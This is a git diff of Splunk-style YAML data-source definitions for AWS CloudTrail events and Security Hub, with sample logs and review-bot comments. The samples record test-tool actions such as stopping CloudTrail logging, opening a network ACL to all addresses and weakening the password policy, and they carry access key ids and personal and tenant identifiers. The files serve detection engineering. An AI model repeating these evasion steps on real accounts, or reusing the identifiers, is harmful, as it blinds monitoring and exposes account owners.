+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aclProtocol
+- requestParameters.cidrBlock
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleAction
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- rule_action
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_ip_range
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+ "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+ "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:49:49Z",
+ "eventSource": "ec2.amazonaws.com", "eventName": "ReplaceNetworkAclEntry", "awsRegion":
+ "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+ "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 20,
+ "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol":
+ "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "97b40da9-9291-4a92-8e9e-892b6887ffc9",
+ "_return": true}, "requestID": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "eventID":
+ "46fe04b8-d007-4933-8bb8-c8b65c1121fa", "readOnly": false, "eventType": "AwsApiCall",
+ "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
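Review bot: The example's `requestParameters.icmpTypeCode` and `requestParameters.portRange` are not represented in `fields`, while the sibling PutBucketLifecycle hunk does list parameters whose sample value is empty (`requestParameters.lifecycle` with `""`). Both keys are `{}` in this sample, which presumably yields no extracted field, but for a NACL entry scoped to a specific protocol the port range carries the values a detection on rule scope would need. If the list is meant to enumerate what the add-on can extract rather than what this one capture produced, those entries belong here; otherwise a comment such as `# portRange/icmpTypeCode are empty in the sample and therefore not extracted` would make the omission deliberate.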
diff --git a/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml b/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml
new file mode 100644
index 0000000000..0a522fb620
--- /dev/null
+++ b/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail SetDefaultPolicyVersion
+id: 06e0b5a0-8d36-485e-befc-4ae79d77ef6c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail SetDefaultPolicyVersion
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- requestParameters.versionId
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLESDK2NOSX", "arn": "arn:aws:iam::111111111111:user/AtomicRedTeam",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKMZDMPVA", "userName":
+ "AtomicRedTeam"}, "eventTime": "2021-03-02T21:05:49Z", "eventSource": "iam.amazonaws.com",
+ "eventName": "SetDefaultPolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress":
+ "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64
+ command/iam.set-default-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/VulnerablePolicy",
+ "versionId": "v1"}, "responseElements": null, "requestID": "3bdf8738-2eab-4ae8-a858-2e2a4ccfc66b",
+ "eventID": "742f6e55-4bc7-49e2-965f-56ffbc46a980", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+ "111111111111"}'
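Review bot: The example_log masks the account to 111111111111 but leaves the other identifying values as captured — the IAM access key id `AKIAYTOGP2RLKMZDMPVA` in `userIdentity.accessKeyId`, the `AIDA…` principal id, the IAM user name and the public `sourceIPAddress` `73.15.72.101`. AKIA/ASIA-prefixed key ids match the pattern most secret scanners alert on, and together with the user name they tie the committed sample to a real account principal, so the masking should be applied to the whole event rather than to accountId alone. AWS's documented placeholder `"accessKeyId": "AKIAIOSFODNN7EXAMPLE"` and an RFC 5737 address such as `"sourceIPAddress": "203.0.113.10"` keep every entry in `fields:` backed by the sample without carrying a real value. The same applies to the stoplogging, updateaccountpasswordpolicy, updateloginprofile, updatesamlprovider and updatetrail hunks, whose samples carry further `AKIA…`/`ASIA…` key ids and public source addresses.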
diff --git a/data_sources/aws_cloudtrail_stoplogging.yml b/data_sources/aws_cloudtrail_stoplogging.yml
new file mode 100644
index 0000000000..3426d95f4e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_stoplogging.yml
@@ -0,0 +1,95 @@
+name: AWS CloudTrail StopLogging
+id: c5de7c54-4809-4659-bf9f-3bacf8bdfd35
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail StopLogging
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.name
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+ "eventTime": "2022-06-30T21:26:49Z", "eventSource": "cloudtrail.amazonaws.com",
+ "eventName": "StopLogging", "awsRegion": "us-west-2", "sourceIPAddress": "72.193.184.209",
+ "userAgent": "stratus-red-team_a6a8f8f2-d560-4062-bd0d-c232130cfcc5", "requestParameters":
+ {"name": "my-cloudtrail-trail"}, "responseElements": null, "requestID": "d8b79caa-08d2-4f7e-b93a-73bb7b85f260",
+ "eventID": "9f8d2b82-6e9d-45b8-9055-78d8c00ca416", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..4080c90e4e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml
@@ -0,0 +1,107 @@
+name: AWS CloudTrail UpdateAccountPasswordPolicy
+id: 35a8cc97-3600-40e1-a5d1-1c2ad5060be0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.allowUsersToChangePassword
+- requestParameters.hardExpiry
+- requestParameters.minimumPasswordLength
+- requestParameters.requireLowercaseCharacters
+- requestParameters.requireNumbers
+- requestParameters.requireSymbols
+- requestParameters.requireUppercaseCharacters
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+ "accessKeyId": "ASIASBMSCQHHZZ4THONS", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2023-01-26T22:10:41Z", "mfaAuthenticated": "false"}}},
+ "eventTime": "2023-01-26T22:38:59Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "UpdateAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+ "userAgent": "AWS Internal", "requestParameters": {"minimumPasswordLength": 6, "requireSymbols":
+ true, "requireNumbers": false, "requireUppercaseCharacters": false, "requireLowercaseCharacters":
+ false, "allowUsersToChangePassword": false, "hardExpiry": false}, "responseElements":
+ null, "requestID": "7685efa9-5c56-451a-bd25-3db520108589", "eventID": "ccc1d5c2-dd72-4798-8023-ed5a4205f2d5",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_updateloginprofile.yml b/data_sources/aws_cloudtrail_updateloginprofile.yml
new file mode 100644
index 0000000000..dcdab36afe
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updateloginprofile.yml
@@ -0,0 +1,97 @@
+name: AWS CloudTrail UpdateLoginProfile
+id: 1db79158-e5d3-4d35-9d3c-586e44e09f1c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateLoginProfile
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.userName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+ "eventTime": "2021-03-05T01:02:59Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "UpdateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101",
+ "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.update-login-profile",
+ "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": null, "requestID":
+ "08f38478-1749-4fb5-b07c-469d3448777a", "eventID": "033580e7-bbba-4b70-be63-7eeddb04b842",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+ "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_updatesamlprovider.yml b/data_sources/aws_cloudtrail_updatesamlprovider.yml
new file mode 100644
index 0000000000..018f6fe6dc
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updatesamlprovider.yml
@@ -0,0 +1,187 @@
+name: AWS CloudTrail UpdateSAMLProvider
+id: e5eb628d-711e-499c-87d9-8fa5dee419ec
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateSAMLProvider
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.sAMLMetadataDocument
+- requestParameters.sAMLProviderArn
+- responseElements.sAMLProviderArn
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLMZGPIW6C", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLKFUVAQAIJ", "arn":
+ "arn:aws:iam::111111111111:role/rodonmicrotestrole", "accountId": "111111111111",
+ "userName": "rodonmicrotestrole"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-20T03:10:32Z"}}}, "eventTime": "2021-01-20T03:12:39Z",
+ "eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider", "awsRegion":
+ "us-east-1", "sourceIPAddress": "66.176.252.11", "userAgent": "aws-internal/3 aws-sdk-java/1.11.930
+ Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01
+ java/1.8.0_275 vendor/Oracle_Corporation", "requestParameters": {"sAMLMetadataDocument":
+ "ncp+pf0e75KdoRTy1PQeu74OKXjcVNM+bnT7Ns6cwQI=J9PRCq201gGMzMtt4Ye+gsM7xOgrNvDg/usqIMvsyUy2r/MeTBz5FKCK+Okjwm49vyTWUoUioYGiwm/TD2Knv59g1zy+/OjZcmBJgDrCmksFJdkwG/fDlOZQNGuj2qh1CEKL5n6Ipy2z1dQ9XUmhhndtXNnjdZ0fJ9QWufWoxveSCLHcU7eUB9obwq96pbAp+6as0XreMNC/xPv5gDdHfKaIppsXtEwcZY7m1c25jDWqPUTQrtbVC0uryffg1Yu0JLTr646GMTzxulBSpQGRfNf5UT0bUiLtKngi++UHrngKdv3ovWwpVmY82JhG7rMDhkuWZu3LdEFvY3svNxGtsQ==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
+ mutable display name of the user.SubjectAn
+ immutable, globally unique, non-reusable identifier of the user that is unique to
+ the application for which a token is issued.Given
+ NameFirst name of the user.SurnameLast
+ name of the user.Display
+ NameDisplay name of the user.Nick
+ NameNick name of the user.Authentication
+ InstantThe time (UTC) when the user is authenticated
+ to Windows Azure Active Directory.Authentication
+ MethodThe method that Windows Azure Active
+ Directory uses to authenticate users.ObjectIdentifierPrimary
+ identifier for the user in the directory. Immutable, globally unique, non-reusable.TenantIdIdentifier
+ for the user''s tenant.IdentityProviderIdentity
+ provider for the user.EmailEmail
+ address of the user.GroupsGroups
+ of the user.External
+ Access TokenAccess token issued by external
+ identity provider.External
+ Access Token ExpirationUTC expiration time
+ of access token issued by external identity provider.External
+ OpenID 2.0 IdentifierOpenID 2.0 identifier
+ issued by external identity provider.GroupsOverageClaimIssued
+ when number of user''s group claims exceeds return limit.Role
+ ClaimRoles that the user or Service Principal
+ is attached toRoleTemplate
+ Id ClaimRole template id of the Built-in Directory
+ Roles that the user is a member ofhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfedhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-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://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfedhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-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", "sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"},
+ "responseElements": {"sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"},
+ "requestID": "83d621ad-5b33-4ff0-acf4-0043cb432844", "eventID": "51b6d859-0cc4-4591-ba76-3494f3f43832",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+ "Management", "recipientAccountId": "111111111111"}'
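Review bot: The example_log embeds the complete `sAMLMetadataDocument` — the base64 signature block, the claim descriptions and the federation endpoints, which carry the Azure tenant id `0e8108b1-18e9-41a4-961b-dfcddf92ef08`, while `principalId` and `arn` carry a personal `…@….onmicrosoft.com` identity that is not masked the way accountId is. The data-source object only needs the key to be present so that `requestParameters.sAMLMetadataDocument` in `fields:` is backed by the sample; a short synthetic placeholder such as `"sAMLMetadataDocument": "<EntityDescriptor entityID=\"https://sts.example.test/\">...</EntityDescriptor>"` keeps that property, removes a real tenant's identifiers and brings the file down to the size of the sibling CloudTrail objects. The folded single-quoted scalar also makes the document hard to review line by line; with the placeholder the value fits in a few lines like the other samples.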
diff --git a/data_sources/aws_cloudtrail_updatetrail.yml b/data_sources/aws_cloudtrail_updatetrail.yml
new file mode 100644
index 0000000000..5da5e0619d
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updatetrail.yml
@@ -0,0 +1,107 @@
+name: AWS CloudTrail UpdateTrail
+id: d5b7a1eb-711a-4c96-aa93-235fe3c8a939
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.includeGlobalServiceEvents
+- requestParameters.isMultiRegionTrail
+- requestParameters.name
+- responseElements.includeGlobalServiceEvents
+- responseElements.isMultiRegionTrail
+- responseElements.isOrganizationTrail
+- responseElements.logFileValidationEnabled
+- responseElements.name
+- responseElements.s3BucketName
+- responseElements.trailARN
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:42:26Z", "eventSource": "cloudtrail.amazonaws.com",
+ "eventName": "UpdateTrail", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/cloudtrail.update-trail", "requestParameters": {"name": "Regulatory", "includeGlobalServiceEvents":
+ true, "isMultiRegionTrail": true}, "responseElements": {"name": "Regulatory", "s3BucketName":
+ "s3-for-cloudtrail-logs111", "includeGlobalServiceEvents": true, "isMultiRegionTrail":
+ true, "trailARN": "arn:aws:cloudtrail:us-west-2:111111111111:trail/Regulatory",
+ "logFileValidationEnabled": false, "isOrganizationTrail": false}, "requestID": "0da61466-5bba-43f9-b7e1-27437de120b2",
+ "eventID": "ce02af60-f29e-4bc2-8b29-31c12f408fed", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/AWS_Security_Hub.yml b/data_sources/aws_security_hub.yml
similarity index 54%
rename from data_sources/cloud/AWS_Security_Hub.yml
rename to data_sources/aws_security_hub.yml
index b03d92f5e1..7d78a1de32 100644
--- a/data_sources/cloud/AWS_Security_Hub.yml
+++ b/data_sources/aws_security_hub.yml
@@ -1,119 +1,120 @@
name: AWS Security Hub
id: b02bfbf3-294f-478e-99a1-e24b8c692d7e
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for AWS Security Hub
source: aws_securityhub_finding
sourcetype: aws:securityhub:finding
supported_TA:
- name: Splunk Add-on for Amazon Web Services (AWS)
- version: 7.4.1
+- name: Splunk Add-on for Amazon Web Services (AWS)
url: https://splunkbase.splunk.com/app/1876
-event_names: []
+ version: 7.4.1
fields:
- - _time
- - AwsAccountId
- - CreatedAt
- - Description
- - FirstObservedAt
- - GeneratorId
- - Id
- - LastObservedAt
- - ProductArn
- - ProductFields.aws/guardduty/service/action/actionType
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/api
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
- - ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
- - ProductFields.aws/guardduty/service/additionalInfo/sample
- - ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
- - ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
- - ProductFields.aws/guardduty/service/archived
- - ProductFields.aws/guardduty/service/count
- - ProductFields.aws/guardduty/service/detectorId
- - ProductFields.aws/guardduty/service/eventFirstSeen
- - ProductFields.aws/guardduty/service/eventLastSeen
- - ProductFields.aws/guardduty/service/resourceRole
- - ProductFields.aws/guardduty/service/serviceName
- - ProductFields.aws/securityhub/CompanyName
- - ProductFields.aws/securityhub/FindingId
- - ProductFields.aws/securityhub/ProductName
- - RecordState
- - Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
- - Resources{}.Details.AwsEc2Instance.ImageId
- - Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
- - Resources{}.Details.AwsEc2Instance.LaunchedAt
- - Resources{}.Details.AwsEc2Instance.SubnetId
- - Resources{}.Details.AwsEc2Instance.Type
- - Resources{}.Details.AwsEc2Instance.VpcId
- - Resources{}.Details.AwsIamAccessKey.PrincipalId
- - Resources{}.Details.AwsIamAccessKey.PrincipalName
- - Resources{}.Details.AwsIamAccessKey.PrincipalType
- - Resources{}.Details.AwsS3Bucket.CreatedAt
- - Resources{}.Details.AwsS3Bucket.OwnerId
- - Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
- - Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
- - Resources{}.Id
- - Resources{}.Partition
- - Resources{}.Region
- - Resources{}.Tags.GeneratedFindingInstaceTag1
- - Resources{}.Tags.GeneratedFindingInstaceTag2
- - Resources{}.Tags.GeneratedFindingInstaceTag3
